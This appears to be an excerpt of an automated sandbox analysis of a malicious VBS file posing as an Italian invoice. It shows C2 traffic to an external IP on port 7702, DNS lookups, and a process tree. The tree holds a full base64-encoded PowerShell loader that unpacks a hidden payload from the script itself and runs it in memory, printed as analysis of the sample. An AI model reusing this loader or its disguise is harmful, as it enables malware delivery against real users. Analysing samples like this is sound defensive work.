                                                                              Oct 31, 2024 14:16:34.307230949 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.307238102 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.307286024 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.351846933 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.351864100 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.351893902 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.351983070 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.352314949 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.352494955 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.395947933 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.396049976 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.396065950 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.396078110 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.396173000 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.396173000 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.396327019 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.398888111 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.398945093 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.398962021 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.399005890 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.399025917 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.402918100 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.402931929 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.402944088 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.403059959 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.422089100 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422116041 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422127962 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422178984 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.422178984 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.422250032 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422261953 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422350883 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422396898 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.422424078 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422435999 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422496080 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.422727108 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422925949 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422938108 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422949076 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422959089 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.422979116 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.423015118 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.425307989 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.425381899 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.425436974 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.425676107 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.425687075 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.425743103 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.469850063 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.469862938 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.469875097 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.469983101 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.470488071 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.470545053 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.471019983 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.471030951 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.471111059 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.471117973 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.514554977 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.514591932 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.514605999 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.514663935 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.514699936 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.517504930 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.517528057 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.517539978 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.517575979 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.517582893 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.517643929 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.517673016 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.517714024 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.517776012 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.521516085 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.521600008 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.521611929 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.521668911 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.540754080 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.540782928 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.540801048 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.540827990 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.540872097 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.541008949 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.596154928 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.615108013 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:34.620728016 CET770249793185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:34.620821953 CET497937702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.407243013 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.412297964 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.412378073 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.426783085 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.426906109 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.431969881 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.431986094 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.431996107 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.432005882 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.432020903 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.432066917 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.432074070 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.432084084 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.432094097 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.432111979 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.432118893 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.432121992 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.432152033 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.432190895 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.437063932 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.437122107 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.437150002 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.437161922 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.437171936 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.437197924 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.437230110 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.437310934 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.437320948 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.437383890 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.478749990 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.478890896 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.526679039 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.526848078 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.574623108 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.574677944 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.622704983 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.622755051 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.670617104 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.670665979 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.722660065 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.722847939 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.770723104 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:35.770812988 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:35.822676897 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.030258894 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.443952084 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.451297045 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.451411009 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.457024097 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.852598906 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.852780104 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.857534885 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857633114 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857696056 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857706070 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857717991 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857728958 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857759953 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.857788086 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.857811928 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857822895 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857831955 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857847929 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857856035 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857872963 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.857884884 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.857892036 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.857922077 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.857933044 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.857994080 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858037949 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858047009 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858057976 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858102083 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.858117104 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.858187914 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858197927 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858207941 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858217955 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858234882 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858243942 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.858244896 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858254910 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858263969 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858269930 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:36.858273983 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858292103 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858300924 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858310938 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858319044 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858329058 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858339071 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858347893 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858356953 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858381987 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858391047 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858400106 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858448982 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858551979 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858671904 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858681917 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858763933 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858947039 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858956099 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858966112 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858974934 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.858985901 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.859003067 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.859010935 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862730026 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862755060 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862763882 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862775087 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862786055 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862859964 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862869024 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862879038 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862911940 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862920046 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862938881 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.862947941 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863003969 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863015890 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863040924 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863051891 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863118887 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863128901 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863140106 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863218069 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863226891 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863235950 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863245964 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863256931 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863296032 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863305092 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863365889 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863410950 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863419056 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863429070 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863440990 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863500118 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863508940 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863518953 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863529921 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863538980 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863609076 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:36.863697052 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:37.409511089 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:37.414407969 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:37.414555073 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:37.419399977 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:37.677963972 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:37.815659046 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:37.815735102 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:37.953704119 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:37.957324982 CET498157702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:37.964373112 CET770249815185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:37.964431047 CET498157702192.168.2.7185.36.141.107
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 31, 2024 14:16:18.484611988 CET5980353192.168.2.71.1.1.1
                                                                              Oct 31, 2024 14:16:18.492244005 CET53598031.1.1.1192.168.2.7
                                                                              Oct 31, 2024 14:16:35.085961103 CET6399353192.168.2.71.1.1.1
                                                                              Oct 31, 2024 14:16:35.093359947 CET53639931.1.1.1192.168.2.7
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 31, 2024 14:16:18.484611988 CET192.168.2.71.1.1.10x4a4cStandard query (0)90.168.9.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                              Oct 31, 2024 14:16:35.085961103 CET192.168.2.71.1.1.10x95fStandard query (0)90.168.9.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 31, 2024 14:16:18.492244005 CET1.1.1.1192.168.2.70x4a4cName error (3)90.168.9.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                              Oct 31, 2024 14:16:35.093359947 CET1.1.1.1192.168.2.70x95fName error (3)90.168.9.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:2
                                                                              Start time:09:16:03
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
                                                                              Imagebase:0x7ff783f40000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:09:16:04
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y
                                                                              Imagebase:0x7ff6692d0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:09:16:04
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:09:16:06
                                                                              Start date:31/10/2024
                                                                              Path:C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                                                                              Imagebase:0x3d0000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
